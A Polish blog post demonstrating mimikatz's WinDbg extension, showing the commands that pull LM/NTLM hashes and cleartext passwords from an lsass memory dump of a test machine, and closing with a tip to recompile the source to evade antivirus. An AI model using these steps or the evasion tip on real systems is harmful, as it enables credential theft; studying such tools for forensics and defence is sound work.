Benjamin kontynuuje swoją pracę nad narzędziami do analizy lsass, czego owocem jest udostępniona dziś biblioteka rozszerzeń dla WinDbg, która - podobnie jak opisywany przeze mnie wcześniej mimikatz - pozwala na wyciąganie informacji ze zrzutów pamięci systemu.
1. Ładujemy dump i szukamy lsass.exe
kd> !process 0 0 lsass.exe
PROCESS 862c0b20 SessionId: 0 Cid: 0210 Peb: 7ffd4000 ParentCid: 0198
DirBase: 7ec410e0 ObjectTable: 89e43ef0 HandleCount: 519.
Image: lsass.exe
2 Ustawiamy kontekst na znaleziony proces
kd> .process /r /p 862c0b20
Implicit process is now 862c0b20
Loading User Symbols
............................................................
3. Ładujemy mimilib
kd> .load mimilib
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Nov 25 2013 11:42:09)
.## ^ ##. Windows build 7600
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz
'#####' WinDBG extension ! * * */
===================================
# * Kernel mode * #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
# * User mode * #
===================================
0:000> !mimikatz
===================================
I w końcu uruchamiamy odpowiednią funkcję rozszerzającą windbg, która grzecznie zwraca nam to, co zgubiliśmy:
kd> !mimikatz
Authentication Id : 0 ; 81867 (00000000:00013fcb)
Session : Interactive from 1
User Name : Admin
Domain : W7PROFENX86VM
msv :
[00000003] Primary
* Username : Admin
* Domain : W7PROFENX86VM
* LM : 65c566d5eff8de4419d6c07b4d0a41ef
* NTLM : e4f1ba73165d937c5fc709517e604d73
tspkg :
* Username : Admin
* Domain : W7PROFENX86VM
* Password : Pa$$w0rd
wdigest :
* Username : Admin
* Domain : W7PROFENX86VM
* Password : Pa$$w0rd
kerberos :
* Username : Admin
* Domain : W7PROFENX86VM
* Password : Pa$$w0rd
ssp :
Authentication Id : 0 ; 81822 (00000000:00013f9e)
Session : Interactive from 1
User Name : Admin
Domain : W7PROFENX86VM
msv :
[00000003] Primary
* Username : Admin
* Domain : W7PROFENX86VM
* LM : 65c566d5eff8de4419d6c07b4d0a41ef
* NTLM : e4f1ba73165d937c5fc709517e604d73
tspkg :
* Username : Admin
* Domain : W7PROFENX86VM
* Password : Pa$$w0rd
wdigest :
* Username : Admin
* Domain : W7PROFENX86VM
* Password : Pa$$w0rd
kerberos :
* Username : Admin
* Domain : W7PROFENX86VM
* Password : Pa$$w0rd
ssp :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
msv :
tspkg : KO
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
[00000000]
[00000001]
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : W7PROFENX86VM$
Domain : WORKGROUP
msv :
tspkg : KO
wdigest :
* Username : W7PROFENX86VM$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : w7profenx86vm$
* Domain : WORKGROUP
* Password : (null)
ssp :
[00000000]
Drobne ostrzeżenie - udostępniona przez Benjamina biblioteka jest już rozpoznawana przez programy antywirusowe, ale wystarczy samodzielnie przekompilować źródła, aby móc cieszyć się nowym narzędziem :)